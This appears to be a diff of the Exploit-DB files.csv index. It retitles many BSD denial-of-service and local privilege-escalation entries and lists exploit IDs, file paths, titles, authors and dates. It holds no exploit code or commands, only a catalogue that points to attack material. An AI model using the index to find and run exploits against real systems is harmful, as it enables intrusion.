 19531,platforms/hardware/dos/19531.txt,"Cisco IOS 12.0.2 - Syslog Crash",1999-01-11,"Olaf Selke",hardware,dos,0
@ -2438,7 +2438,7 @@ id,file,description,date,author,platform,type,port
 20219,platforms/windows/dos/20219.txt,"WebTV for Windows 98/ME - Denial of Service",2000-09-12,Smashstack,windows,dos,0
 20221,platforms/windows/dos/20221.pl,"Jack De Winter WinSMTP 1.6 f/2.0 - Buffer Overflow",2000-09-11,"Guido Bakker",windows,dos,0
 20225,platforms/windows/dos/20225.pl,"Alt-N MDaemon 3.1.1 - Denial of Service",1999-12-01,"Ussr Labs",windows,dos,0
-20226,platforms/freebsd/dos/20226.c,"FreeBSD Kernel - SCTP Remote NULL Ptr Dereference Denial of Service",2012-08-03,"Shaun Colley",freebsd,dos,0
+20226,platforms/freebsd/dos/20226.c,"FreeBSD - SCTP Remote NULL Ptr Dereference Denial of Service",2012-08-03,"Shaun Colley",freebsd,dos,0
 20228,platforms/windows/dos/20228.pl,"TYPSoft FTP Server 0.7.x - FTP Server Remote Denial of Service",1999-06-08,dethy,windows,dos,0
 20229,platforms/multiple/dos/20229.txt,"IBM Websphere Application Server 3.0.2 Server Plugin - Denial of Service",2000-09-15,"Rude Yak",multiple,dos,0
 20233,platforms/windows/dos/20233.txt,"NetcPlus BrowseGate 2.80 - Denial of Service",2000-09-21,"Delphis Consulting",windows,dos,0
@ -3012,7 +3012,7 @@ id,file,description,date,author,platform,type,port
 23274,platforms/linux/dos/23274.pl,"Coreutils 4.5.x - LS Width Argument Integer Overflow",2003-10-22,druid,linux,dos,0
 23276,platforms/multiple/dos/23276.java,"Sun Java Virtual Machine 1.x - Slash Path Security Model Circumvention",2003-10-22,"Last Stage of Delirium",multiple,dos,0
 23388,platforms/windows/dos/23388.txt,"Valve Software Half-Life Dedicated Server 3.1/4.1 - Information Disclosure/Denial of Service",2003-11-19,3APA3A,windows,dos,0
-23389,platforms/openbsd/dos/23389.c,"OpenBSD 3.3/3.4 sysctl - Local Denial of Service",2003-11-19,anonymous,openbsd,dos,0
+23389,platforms/openbsd/dos/23389.c,"OpenBSD 3.3/3.4 - 'sysctl' Local Denial of Service",2003-11-19,anonymous,openbsd,dos,0
 23279,platforms/windows/dos/23279.txt,"DIMIN Viewer 5.4.0 - Crash (PoC)",2012-12-10,"Jean Pascal Pereira",windows,dos,0
 23280,platforms/windows/dos/23280.txt,"FreeVimager 4.1.0 - Crash (PoC)",2012-12-10,"Jean Pascal Pereira",windows,dos,0
 23314,platforms/multiple/dos/23314.c,"Serious Sam Engine 1.0.5 - Remote Denial of Service",2003-10-30,"Luigi Auriemma",multiple,dos,0
@ -3220,7 +3220,7 @@ id,file,description,date,author,platform,type,port
 24426,platforms/windows/dos/24426.html,"Opera Web Browser 7.23 - Empty Embedded Object JavaScript Denial of Service",2004-09-01,Stevo,windows,dos,0
 24437,platforms/windows/dos/24437.py,"Apple Quick Time Player (Windows) 7.7.3 - Out of Bound Read",2013-01-29,"Debasish Mandal",windows,dos,0
 24448,platforms/windows/dos/24448.svg,"Opera SVG - Use-After-Free",2013-02-05,Cons0ul,windows,dos,0
-24450,platforms/freebsd/dos/24450.txt,"FreeBSD 9.1 ftpd - Remote Denial of Service",2013-02-05,"Maksymilian Arciemowicz",freebsd,dos,0
+24450,platforms/freebsd/dos/24450.txt,"FreeBSD 9.1 - 'ftpd' Remote Denial of Service",2013-02-05,"Maksymilian Arciemowicz",freebsd,dos,0
 24463,platforms/windows/dos/24463.txt,"Cool PDF Reader 3.0.2.256 - Buffer Overflow",2013-02-07,"Chris Gabriel",windows,dos,0
 24468,platforms/windows/dos/24468.pl,"KMPlayer - Denial of Service",2013-02-10,Jigsaw,windows,dos,0
 24511,platforms/windows/dos/24511.txt,"SAP NetWeaver Message Server - Multiple Vulnerabilities",2013-02-17,"Core Security",windows,dos,0
@ -3666,7 +3666,7 @@ id,file,description,date,author,platform,type,port
 30208,platforms/windows/dos/30208.txt,"IcoFX 2.5.0.0 - '.ico' Buffer Overflow",2013-12-11,"Core Security",windows,dos,0
 28811,platforms/osx/dos/28811.txt,"Apple Motion 5.0.7 - Integer Overflow",2013-10-08,"Jean Pascal Pereira",osx,dos,0
 28812,platforms/freebsd/dos/28812.c,"FreeBSD 5.5/6.x - Scheduler Policy Local Denial of Service",2006-10-13,"Diane Bruce",freebsd,dos,0
-28813,platforms/freebsd/dos/28813.c,"FreeBSD 6.0/6.1 Ftrucante - Local Denial of Service",2006-10-13,"Kirk Russell",freebsd,dos,0
+28813,platforms/freebsd/dos/28813.c,"FreeBSD 6.0/6.1 - Ftrucante Local Denial of Service",2006-10-13,"Kirk Russell",freebsd,dos,0
 28816,platforms/linux/dos/28816.txt,"KMail 1.x - HTML Element Handling Denial of Service",2006-10-16,nnp,linux,dos,0
 28822,platforms/windows/dos/28822.txt,"Microsoft Class Package Export Tool 5.0.2752 - 'Clspack.exe' Local Buffer Overflow",2006-10-16,mmd_000,windows,dos,0
 28834,platforms/windows/dos/28834.txt,"Microsoft Windows XP - 'cmd.exe' Buffer Overflow",2006-10-20,"Alberto Cortes",windows,dos,0
@ -3691,7 +3691,7 @@ id,file,description,date,author,platform,type,port
 29164,platforms/windows/dos/29164.cpp,"FortKnox Personal Firewall 9.0.305.0/10.0.305.0 - Kernel Driver 'fortknoxfw.sys' Memory Corruption",2013-10-24,"Arash Allebrahim",windows,dos,0
 29170,platforms/windows/dos/29170.c,"Nvidia NView 3.5 - 'Keystone.exe' Local Denial of Service",2006-11-23,Hessam-x,windows,dos,0
 29172,platforms/windows/dos/29172.txt,"Microsoft Office 97 - HTMLMARQ.OCX Library Denial of Service",2006-11-22,"Michal Bucko",windows,dos,0
-29204,platforms/netbsd_x86/dos/29204.pl,"NetBSD 3.1 FTPd / Tnftpd - Port Remote Buffer Overflow",2006-12-01,kcope,netbsd_x86,dos,0
+29204,platforms/netbsd_x86/dos/29204.pl,"NetBSD 3.1 - 'FTPd / Tnftpd' Port Remote Buffer Overflow",2006-12-01,kcope,netbsd_x86,dos,0
 29229,platforms/windows/dos/29229.txt,"Microsoft Internet Explorer 6 - Frame Src Denial of Service",2006-12-05,"Juan Pablo Lopez",windows,dos,0
 29236,platforms/windows/dos/29236.html,"Microsoft Internet Explorer 7 - CSS Width Element Denial of Service",2006-12-06,xiam.core,windows,dos,0
 29285,platforms/windows/dos/29285.txt,"Microsoft Windows Media Player 6.4/10.0 - MID Malformed Header Chunk Denial of Service",2006-12-15,shinnai,windows,dos,0
@ -3982,7 +3982,7 @@ id,file,description,date,author,platform,type,port
 31522,platforms/windows/dos/31522.py,"OneHTTPD 0.8 - Crash (PoC)",2014-02-08,"Mahmod Mahajna (Mahy)",windows,dos,80
 31542,platforms/multiple/dos/31542.txt,"IBM solidDB 6.0.10 - Format String / Denial of Service",2008-03-26,"Luigi Auriemma",multiple,dos,0
 31984,platforms/linux/dos/31984.txt,"Mozilla Firefox 3.0 - '.JPEG' File Denial of Service",2008-06-27,"Beenu Arora",linux,dos,0
-31550,platforms/bsd/dos/31550.c,"Multiple BSD Distributions - 'strfmon()' Integer Overflow",2008-03-27,"Maksymilian Arciemowicz",bsd,dos,0
+31550,platforms/bsd/dos/31550.c,"BSD (Multiple Distributions) - 'strfmon()' Integer Overflow",2008-03-27,"Maksymilian Arciemowicz",bsd,dos,0
 31552,platforms/linux/dos/31552.txt,"Wireshark 0.99.8 - X.509sat Dissector Unspecified Denial of Service",2008-03-28,"Peter Makrai",linux,dos,0
 31553,platforms/linux/dos/31553.txt,"Wireshark 0.99.8 - LDAP Dissector Unspecified Denial of Service",2008-03-28,"Peter Makrai",linux,dos,0
 31554,platforms/linux/dos/31554.txt,"Wireshark 0.99.8 - SCCP Dissector Decode As Feature Unspecified Denial of Service",2008-03-28,"Peter Makrai",linux,dos,0
@ -4172,7 +4172,7 @@ id,file,description,date,author,platform,type,port
 33043,platforms/linux/dos/33043.txt,"Linux Kernel 2.6.x (Sparc64) - '/proc/iomem' Local Denial of Service",2009-05-03,"Mikulas Patocka",linux,dos,0
 33049,platforms/linux/dos/33049.txt,"LibTIFF 3.8.2 - 'LZWDecodeCompat()' Remote Buffer Underflow",2009-05-21,wololo,linux,dos,0
 33056,platforms/windows/dos/33056.pl,"Symantec Endpoint Protection Manager 12.1.x - Overflow (SEH) (PoC)",2014-04-27,st3n,windows,dos,0
-33058,platforms/multiple/dos/33058.txt,"Multiple BSD Distributions - 'gdtoa/misc.c' Memory Corruption",2009-05-26,"Maksymilian Arciemowicz",multiple,dos,0
+33058,platforms/multiple/dos/33058.txt,"BSD (Multiple Distributions) - 'gdtoa/misc.c' Memory Corruption",2009-05-26,"Maksymilian Arciemowicz",multiple,dos,0
 33059,platforms/windows/dos/33059.smpl,"BaoFeng Storm 3.9.62 - '.Playlist' File Buffer Overflow",2009-05-28,Jambalaya,windows,dos,0
 33062,platforms/windows/dos/33062.txt,"Apple Safari 4 - 'reload()' Denial of Service",2009-06-02,SkyOut,windows,dos,0
 33073,platforms/linux/dos/33073.c,"NTP ntpd monlist Query Reflection - Denial of Service",2014-04-28,"Danilo PC",linux,dos,123
@ -4225,7 +4225,7 @@ id,file,description,date,author,platform,type,port
 33312,platforms/linux/dos/33312.txt,"Mozilla Firefox 3.5.3 - Floating Point Conversion Heap Overflow",2009-10-27,"Alin Rad Pop",linux,dos,0
 33314,platforms/linux/dos/33314.html,"Mozilla Firefox 3.0.14 - Remote Memory Corruption",2009-10-27,"Carsten Book",linux,dos,0
 33318,platforms/bsd/dos/33318.txt,"OpenBSD 4.6 / NetBSD 5.0.1 - 'printf(1)' Format String Parsing Denial of Service",2009-10-30,"Maksymilian Arciemowicz",bsd,dos,0
-33319,platforms/bsd/dos/33319.txt,"Multiple BSD Distributions - 'printf(3)' Memory Corruption",2009-10-30,"Maksymilian Arciemowicz",bsd,dos,0
+33319,platforms/bsd/dos/33319.txt,"BSD (Multiple Distributions) - 'printf(3)' Memory Corruption",2009-10-30,"Maksymilian Arciemowicz",bsd,dos,0
 33591,platforms/linux/dos/33591.sh,"lighttpd 1.4/1.5 - Slow Request Handling Remote Denial of Service",2010-02-02,"Li Ming",linux,dos,0
 33592,platforms/linux/dos/33592.txt,"Linux Kernel 2.6.x - KVM 'pit_ioport_read()' Local Denial of Service",2010-02-02,"Marcelo Tosatti",linux,dos,0
 33328,platforms/hardware/dos/33328.txt,"Skybox Security 6.3.x < 6.4.x - Multiple Denial of Service Vulnerabilities",2014-05-12,"Luigi Vezzoso",hardware,dos,0
@ -4475,7 +4475,7 @@ id,file,description,date,author,platform,type,port
 35895,platforms/windows/dos/35895.txt,"RealityServer Web Services RTMP Server 3.1.1 build 144525.5 - Null Pointer Dereference Denial of Service",2011-06-28,"Luigi Auriemma",windows,dos,0
 35913,platforms/android/dos/35913.txt,"Android WiFi-Direct - Denial of Service",2015-01-26,"Core Security",android,dos,0
 35935,platforms/windows/dos/35935.py,"UniPDF 1.1 - Crash (PoC) (SEH)",2015-01-29,bonze,windows,dos,0
-35938,platforms/freebsd/dos/35938.txt,"FreeBSD Kernel - Multiple Vulnerabilities",2015-01-29,"Core Security",freebsd,dos,0
+35938,platforms/freebsd/dos/35938.txt,"FreeBSD - Multiple Vulnerabilities",2015-01-29,"Core Security",freebsd,dos,0
 35939,platforms/hardware/dos/35939.txt,"Alice Modem 1111 - 'rulename' Cross-Site Scripting / Denial of Service",2011-07-12,"Moritz Naumann",hardware,dos,0
 35951,platforms/linux/dos/35951.py,"Exim ESMTP 4.80 - glibc gethostbyname Denial of Service",2015-01-29,1n3,linux,dos,0
 35957,platforms/linux/dos/35957.txt,"Linux Kernel 2.6.26 - Auerswald USB Device Driver Buffer Overflow (PoC)",2009-10-19,"R. Dominguez Veg",linux,dos,0
@ -5065,7 +5065,7 @@ id,file,description,date,author,platform,type,port
 39561,platforms/windows/dos/39561.txt,"Microsoft Windows Kernel - 'ATMFD.dll' OTF Font Processing Stack Corruption (MS16-026)",2016-03-14,"Google Security Research",windows,dos,0
 39562,platforms/windows/dos/39562.html,"Microsoft Internet Explorer - Read AV in MSHTML!Layout::LayoutBuilderDivider::BuildPageLayout (MS16-023)",2016-03-14,"Google Security Research",windows,dos,0
 39565,platforms/windows/dos/39565.txt,"Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow",2016-03-16,LiquidWorm,windows,dos,0
-39570,platforms/freebsd_x86-64/dos/39570.c,"FreeBSD 10.2 Kernel (x64) - 'amd64_set_ldt' Heap Overflow",2016-03-16,"Core Security",freebsd_x86-64,dos,0
+39570,platforms/freebsd_x86-64/dos/39570.c,"FreeBSD 10.2 (x64) - 'amd64_set_ldt' Heap Overflow",2016-03-16,"Core Security",freebsd_x86-64,dos,0
 39600,platforms/windows/dos/39600.txt,"Avira - Heap Underflow Parsing PE Section Headers",2016-03-23,"Google Security Research",windows,dos,0
 39601,platforms/windows/dos/39601.txt,"Comodo - PackMan Unpacker Insufficient Parameter Validation",2016-03-23,"Google Security Research",windows,dos,0
 39602,platforms/windows/dos/39602.txt,"Comodo - LZMA Decoder Heap Overflow via Insufficient Parameter Checks",2016-03-23,"Google Security Research",windows,dos,0
@ -5720,6 +5720,7 @@ id,file,description,date,author,platform,type,port
 43010,platforms/linux/dos/43010.c,"Linux Kernel - 'AF_PACKET' Use-After-Free",2017-10-17,SecuriTeam,linux,dos,0
 43014,platforms/linux/dos/43014.txt,"Xen - Unbounded Recursion in Pagetable De-typing",2017-10-18,"Google Security Research",linux,dos,0
 43020,platforms/multiple/dos/43020.txt,"Mozilla Firefox < 55 - Denial of Service",2017-10-20,"Amit Sangra",multiple,dos,0
 43026,platforms/windows/dos/43026.py,"ArGoSoft Mini Mail Server 1.0.0.2 - Denial of Service",2017-10-21,"Berk Cem Göksel",windows,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -5801,8 +5802,8 @@ id,file,description,date,author,platform,type,port
 273,platforms/linux/local/273.c,"SquirrelMail - 'chpasswd' Buffer Overflow",2004-04-20,x314,linux,local,0
 281,platforms/tru64/local/281.c,"Tru64 UNIX 4.0g - '/usr/bin/at' Privilege Escalation",2001-03-02,"Cody Tubbs",tru64,local,0
 285,platforms/linux/local/285.c,"Slackware 7.1 - '/usr/bin/mail' Local Exploit",2001-03-03,kengz,linux,local,0
-286,platforms/bsd/local/286.c,"FreeBSD 3.5.1/4.2 - ports package xklock Privilege Escalation",2001-03-03,dethy,bsd,local,0
+286,platforms/bsd/local/286.c,"FreeBSD 3.5.1/4.2 - Ports Package 'xklock' Privilege Escalation",2001-03-03,dethy,bsd,local,0
-287,platforms/bsd/local/287.c,"FreeBSD 3.5.1/4.2 - Ports Package elvrec Privilege Escalation",2001-03-03,dethy,bsd,local,0
+287,platforms/bsd/local/287.c,"FreeBSD 3.5.1/4.2 - Ports Package 'elvrec' Privilege Escalation",2001-03-03,dethy,bsd,local,0
 288,platforms/multiple/local/288.c,"Progress Database Server 8.3b - 'prodb' Privilege Escalation",2001-03-04,"the itch",multiple,local,0
 290,platforms/linux/local/290.sh,"GLIBC 2.1.3 - LD_PRELOAD Local Exploit",2001-03-04,Shadow,linux,local,0
 302,platforms/unix/local/302.c,"UNIX 7th Edition /bin/mkdir - Local Buffer Overflow",2004-06-25,anonymous,unix,local,0
@ -5839,7 +5840,7 @@ id,file,description,date,author,platform,type,port
 393,platforms/linux/local/393.c,"LibPNG 1.2.5 - 'png_jmpbuf()' Local Buffer Overflow",2004-08-13,anonymous,linux,local,0
 394,platforms/linux/local/394.c,"ProFTPd - 'ftpdctl pr_ctrls_connect' Exploit",2004-08-13,pi3,linux,local,0
 395,platforms/windows/local/395.c,"AOL Instant Messenger AIM - 'Away' Message Local Exploit",2004-08-14,mandragore,windows,local,0
-396,platforms/bsd/local/396.c,"OpenBSD ftp - Exploit",2002-01-01,Teso,bsd,local,0
+396,platforms/bsd/local/396.c,"OpenBSD - 'ftp' Exploit",2002-01-01,Teso,bsd,local,0
 401,platforms/windows/local/401.c,"IPSwitch IMail Server 8.1 - Local Password Decryption Utility",2004-08-18,Adik,windows,local,0
 403,platforms/windows/local/403.c,"IPD (Integrity Protection Driver) - Local Exploit",2004-08-18,anonymous,windows,local,0
 411,platforms/linux/local/411.c,"Sendmail 8.11.x (Linux/i386) - Exploit",2001-01-01,sd,linux,local,0
@ -5877,7 +5878,7 @@ id,file,description,date,author,platform,type,port
 714,platforms/solaris/local/714.c,"Solaris 7/8/9 CDE LibDTHelp - Local Buffer Overflow (2)",2004-12-24,"Marco Ivaldi",solaris,local,0
 715,platforms/solaris/local/715.c,"Solaris 8/9 passwd - 'circ()' Privilege Escalation",2004-12-24,"Marco Ivaldi",solaris,local,0
 718,platforms/linux/local/718.c,"Linux Kernel < 2.6.7-rc3 (Slackware 9.1 / Debian 3.0) - 'sys_chown()' Group Ownership Alteration Privilege Escalation",2004-12-24,"Marco Ivaldi",linux,local,0
-739,platforms/bsd/local/739.c,"FreeBSD /usr/bin/top - Format String",2001-07-23,truefinder,bsd,local,0
+739,platforms/bsd/local/739.c,"FreeBSD - '/usr/bin/top' Format String",2001-07-23,truefinder,bsd,local,0
 741,platforms/linux/local/741.pl,"HTGET 0.9.x - Privilege Escalation",2005-01-05,nekd0,linux,local,0
 744,platforms/linux/local/744.c,"Linux Kernel 2.4.29-rc2 - 'uselib()' Privilege Escalation (1)",2005-01-07,"Paul Starzetz",linux,local,0
 749,platforms/windows/local/749.cpp,"Microsoft Windows - Improper Token Validation Local Exploit",2005-01-11,"Cesar Cerrudo",windows,local,0
@ -5987,7 +5988,7 @@ id,file,description,date,author,platform,type,port
 1299,platforms/linux/local/1299.sh,"Linux chfn (SuSE 9.3/10) - Privilege Escalation",2005-11-08,Hunger,linux,local,0
 1300,platforms/linux/local/1300.sh,"Operator Shell (osh) 1.7-14 - Privilege Escalation",2005-11-09,"Charles Stevenson",linux,local,0
 1310,platforms/linux/local/1310.txt,"Sudo 1.6.8p9 - SHELLOPTS/PS4 Environment Variables Privilege Escalation",2005-11-09,"Breno Silva Pinto",linux,local,0
-1311,platforms/bsd/local/1311.c,"FreeBSD 4.x / < 5.4 - master.passwd Disclosure",2005-11-09,kingcope,bsd,local,0
+1311,platforms/bsd/local/1311.c,"FreeBSD 4.x / < 5.4 - 'master.passwd' Disclosure",2005-11-09,kingcope,bsd,local,0
 1316,platforms/linux/local/1316.pl,"Veritas Storage Foundation 4.0 - VCSI18N_LANG Local Overflow",2005-11-12,"Kevin Finisterre",linux,local,0
 1347,platforms/qnx/local/1347.c,"QNX RTOS 6.3.0 (x86) - 'phgrafx' Local Buffer Overflow",2005-11-30,"p. minervini",qnx,local,0
 1360,platforms/solaris/local/1360.c,"Appfluent Database IDS < 2.1.0.103 - Environment Variable Local Exploit",2005-12-07,c0ntex,solaris,local,0
@ -6155,7 +6156,7 @@ id,file,description,date,author,platform,type,port
 3571,platforms/linux/local/3571.php,"PHP < 4.4.5/5.2.1 - '_SESSION unset()' Local Exploit",2007-03-25,"Stefan Esser",linux,local,0
 3572,platforms/linux/local/3572.php,"PHP < 4.4.5/5.2.1 - '_SESSION' Deserialization Overwrite",2007-03-25,"Stefan Esser",linux,local,0
 3576,platforms/windows/local/3576.php,"PHP 5.2.1 with PECL PHPDOC - Local Buffer Overflow",2007-03-25,rgod,windows,local,0
-3578,platforms/bsd/local/3578.c,"FreeBSD mcweject 0.9 (eject) - Buffer Overflow Privilege Escalation",2007-03-26,harry,bsd,local,0
+3578,platforms/bsd/local/3578.c,"FreeBSD mcweject 0.9 'Eject' - Buffer Overflow Privilege Escalation",2007-03-26,harry,bsd,local,0
 3587,platforms/linux/local/3587.c,"Linux Kernel 2.6.20 with DCCP Support - Memory Disclosure (1)",2007-03-27,"Robert Swiecki",linux,local,0
 3593,platforms/windows/local/3593.c,"Corel WordPerfect X3 13.0.0.565 - '.prs' Local Buffer Overflow",2007-03-28,"Jonathan So",windows,local,0
 3595,platforms/linux/local/3595.c,"Linux Kernel 2.6.20 with DCCP Support - Memory Disclosure (2)",2007-03-28,"Robert Swiecki",linux,local,0
@ -6232,7 +6233,7 @@ id,file,description,date,author,platform,type,port
 4517,platforms/windows/local/4517.php,"PHP 5.2.4 'ionCube' Extension - 'safe_mode' / disable_functions Bypass",2007-10-11,shinnai,windows,local,0
 4531,platforms/windows/local/4531.py,"jetAudio 7.x - '.m3u' Local Overwrite (SEH)",2007-10-14,h07,windows,local,0
 4553,platforms/windows/local/4553.php,"PHP 5.x - COM functions 'Safe_mode()' / 'disable_function' Bypass",2007-10-22,shinnai,windows,local,0
-4564,platforms/multiple/local/4564.txt,"Oracle 10g - CTX_DOC.MARKUP SQL Injection",2007-10-23,sh2kerr,multiple,local,0
+4564,platforms/multiple/local/4564.txt,"Oracle 10g - 'CTX_DOC.MARKUP' SQL Injection",2007-10-23,sh2kerr,multiple,local,0
 4570,platforms/multiple/local/4570.pl,"Oracle 10g/11g - SYS.LT.FINDRICSET SQL Injection (1)",2007-10-27,bunker,multiple,local,0
 4571,platforms/multiple/local/4571.pl,"Oracle 10g/11g - SYS.LT.FINDRICSET SQL Injection (2)",2007-10-27,bunker,multiple,local,0
 4572,platforms/multiple/local/4572.txt,"Oracle 10g - LT.FINDRICSET SQL Injection (IDS evasion)",2007-10-27,sh2kerr,multiple,local,0
@ -6330,7 +6331,7 @@ id,file,description,date,author,platform,type,port
 7547,platforms/windows/local/7547.py,"CoolPlayer 2.19 - '.Skin' Local Buffer Overflow (Python)",2008-12-22,Encrypt3d.M!nd,windows,local,0
 7550,platforms/multiple/local/7550.c,"CUPS < 1.3.8-4 - Privilege Escalation",2008-12-22,"Jon Oberheide",multiple,local,0
 7577,platforms/windows/local/7577.pl,"Acoustica Mixcraft 4.2 - Universal Stack Overflow (SEH)",2008-12-24,SkD,windows,local,0
-7581,platforms/freebsd/local/7581.c,"FreeBSD 6x/7 protosw Kernel - Privilege Escalation",2008-12-28,"Don Bailey",freebsd,local,0
+7581,platforms/freebsd/local/7581.c,"FreeBSD 6x/7 - 'protosw' Privilege Escalation",2008-12-28,"Don Bailey",freebsd,local,0
 7582,platforms/windows/local/7582.py,"IntelliTamper 2.07/2.08 - '.map' Local Overwrite (SEH)",2008-12-28,Cnaph,windows,local,0
 7608,platforms/windows/local/7608.py,"IntelliTamper 2.07/2.08 - 'ProxyLogin' Local Stack Overflow",2008-12-29,His0k4,windows,local,0
 7618,platforms/linux/local/7618.c,"Linux Kernel < 2.6.26.4 - SCTP Kernel Memory Disclosure",2008-12-29,"Jon Oberheide",linux,local,0
@ -6374,7 +6375,7 @@ id,file,description,date,author,platform,type,port
 7975,platforms/windows/local/7975.py,"BlazeVideo HDTV Player 3.5 - '.PLF' Playlist File Remote Overflow",2009-02-04,LiquidWorm,windows,local,0
 7994,platforms/windows/local/7994.c,"dBpowerAMP Audio Player 2 - '.pls' Local Buffer Overflow",2009-02-05,SimO-s0fT,windows,local,0
 8010,platforms/windows/local/8010.pl,"feedDemon 2.7 - OPML Outline Tag Buffer Overflow",2009-02-09,cenjan,windows,local,0
-8055,platforms/freebsd/local/8055.txt,"FreeBSD 7.0-RELEASE Telnet Daemon - Privilege Escalation",2009-02-16,kingcope,freebsd,local,0
+8055,platforms/freebsd/local/8055.txt,"FreeBSD 7.0-RELEASE - Telnet Daemon Privilege Escalation",2009-02-16,kingcope,freebsd,local,0
 8067,platforms/multiple/local/8067.txt,"Enomaly ECP / Enomalism < 2.2.1 - Multiple Local Vulnerabilities",2009-02-16,"Sam Johnston",multiple,local,0
 8074,platforms/multiple/local/8074.rb,"Oracle 10g - MDSYS.SDO_TOPO_DROP_FTBL SQL Injection (Metasploit)",2009-02-18,sh2kerr,multiple,local,0
 8108,platforms/osx/local/8108.c,"Apple Mac OSX xnu 1228.x - Local Kernel Memory Disclosure",2009-02-25,mu-b,osx,local,0
@ -6406,7 +6407,7 @@ id,file,description,date,author,platform,type,port
 8249,platforms/windows/local/8249.php,"BS.Player 2.34 Build 980 - '.bsl' Local Buffer Overflow (SEH)",2009-03-20,Nine:Situations:Group,windows,local,0
 8250,platforms/windows/local/8250.txt,"CloneCD/DVD 'ElbyCDIO.sys' < 6.0.3.2 - Privilege Escalation",2009-03-20,"NT Internals",windows,local,0
 8251,platforms/windows/local/8251.py,"BS.Player 2.34 - '.bsl' Universal Overwrite (SEH)",2009-03-20,His0k4,windows,local,0
-8261,platforms/freebsd/local/8261.c,"FreeBSD 7.0/7.1 - 'ktimer' Kernel Privilege Escalation",2009-03-23,mu-b,freebsd,local,0
+8261,platforms/freebsd/local/8261.c,"FreeBSD 7.0/7.1 - 'ktimer' Privilege Escalation",2009-03-23,mu-b,freebsd,local,0
 8266,platforms/osx/local/8266.txt,"Apple Mac OSX xnu 1228.x - 'hfs-fcntl' Kernel Privilege Escalation",2009-03-23,mu-b,osx,local,0
 8267,platforms/windows/local/8267.py,"Zinf Audio Player 2.2.1 - '.pls' Universal Overwrite (SEH)",2009-03-23,His0k4,windows,local,0
 8270,platforms/windows/local/8270.pl,"eXeScope 6.50 - Local Buffer Overflow",2009-03-23,Koshi,windows,local,0
@ -6497,7 +6498,7 @@ id,file,description,date,author,platform,type,port
 9064,platforms/windows/local/9064.pl,"AudioPLUS 2.00.215 - '.lst' / '.m3u' Local Buffer Overflow (SEH)",2009-07-01,hack4love,windows,local,0
 9070,platforms/windows/local/9070.pl,"AudioPLUS 2.00.215 - '.pls' Local Buffer Overflow (SEH)",2009-07-01,Stack,windows,local,0
 9072,platforms/multiple/local/9072.txt,"Oracle 10g - 'SYS.LT.COMPRESSWORKSPACETREE' SQL Injection (2)",2009-07-02,"Sumit Siddharth",multiple,local,0
-9082,platforms/freebsd/local/9082.c,"FreeBSD 7.0/7.1 vfs.usermount - Privilege Escalation",2009-07-09,"Patroklos Argyroudis",freebsd,local,0
+9082,platforms/freebsd/local/9082.c,"FreeBSD 7.0/7.1 - 'vfs.usermount' Privilege Escalation",2009-07-09,"Patroklos Argyroudis",freebsd,local,0
 9083,platforms/lin_x86-64/local/9083.c,"Linux Kernel 2.6.24_16-23/2.6.27_7-10/2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86-64) - 'set_selection()' UTF-8 Off-by-One Privilege Escalation",2009-07-09,sgrakkyu,lin_x86-64,local,0
 9097,platforms/multiple/local/9097.txt,"xscreensaver 5.01 - Arbitrary File Disclosure Symlink Exploit",2009-07-09,kingcope,multiple,local,0
 9104,platforms/windows/local/9104.py,"Photo DVD Maker Pro 8.02 - '.pdm' Local Buffer Overflow (SEH)",2009-07-10,His0k4,windows,local,0
@ -6561,7 +6562,7 @@ id,file,description,date,author,platform,type,port
 9483,platforms/windows/local/9483.pl,"Photodex ProShow Gold 4 - '.psh' Universal Buffer Overflow XP SP3 (SEH)",2009-08-24,corelanc0d3r,windows,local,0
 9486,platforms/windows/local/9486.pl,"KSP 2006 FINAL - '.m3u' Universal Local Buffer Exploit (SEH)",2009-08-24,hack4love,windows,local,0
 9488,platforms/freebsd/local/9488.c,"FreeBSD 6.1 - 'kqueue()' Null Pointer Dereference Privilege Escalation",2009-08-24,"Przemyslaw Frasunek",freebsd,local,0
-9489,platforms/multiple/local/9489.txt,"Multiple BSD Distributions - 'setusercontext()' Vulnerabilities",2009-08-24,kingcope,multiple,local,0
+9489,platforms/multiple/local/9489.txt,"BSD (Multiple Distributions) - 'setusercontext()' Vulnerabilities",2009-08-24,kingcope,multiple,local,0
 9492,platforms/windows/local/9492.c,"Avast! 4.8.1335 Professional - Kernel Local Buffer Overflow",2009-08-24,Heurs,windows,local,0
 9495,platforms/windows/local/9495.pl,"Fat Player 0.6b - '.wav' Universal Local Buffer Exploit",2009-08-24,ahwak2000,windows,local,0
 9501,platforms/windows/local/9501.py,"Audacity 1.2 - '.gro' Universal Buffer Overflow (egg hunter)",2009-08-24,mr_me,windows,local,0
@ -6838,7 +6839,7 @@ id,file,description,date,author,platform,type,port
 13940,platforms/windows/local/13940.pl,"Orbital Viewer 1.04 - '.ov' Local Universal Stack Overflow (SEH)",2010-06-19,Crazy_Hacker,windows,local,0
 13942,platforms/windows/local/13942.pl,"MoreAmp - '.maf' Local Stack Buffer Overflow (SEH)",2010-06-20,Madjix,windows,local,0
 13998,platforms/windows/local/13998.pl,"BlazeDVD 6.0 - '.plf' File Universal Buffer Overflow (SEH)",2010-06-23,Madjix,windows,local,0
-14002,platforms/freebsd/local/14002.c,"FreeBSD Kernel - 'nfs_mount()' Exploit",2010-06-23,"Patroklos Argyroudis",freebsd,local,0
+14002,platforms/freebsd/local/14002.c,"FreeBSD - 'nfs_mount()' Exploit",2010-06-23,"Patroklos Argyroudis",freebsd,local,0
 14029,platforms/windows/local/14029.py,"NO-IP.com Dynamic DNS Update Client 2.2.1 - 'Request' Insecure Encoding Algorithm",2010-06-24,sinn3r,windows,local,0
 14044,platforms/windows/local/14044.pl,"WM Downloader 2.9.2 - Stack Buffer Overflow",2010-06-25,Madjix,windows,local,0
 14046,platforms/windows/local/14046.py,"FieldNotes 32 5.0 - Buffer Overflow (SEH)",2010-06-25,TecR0c,windows,local,0
@ -7054,7 +7055,7 @@ id,file,description,date,author,platform,type,port
 16098,platforms/android/local/16098.c,"Android 1.x/2.x HTC Wildfire - Privilege Escalation",2011-02-02,"The Android Exploid Crew",android,local,0
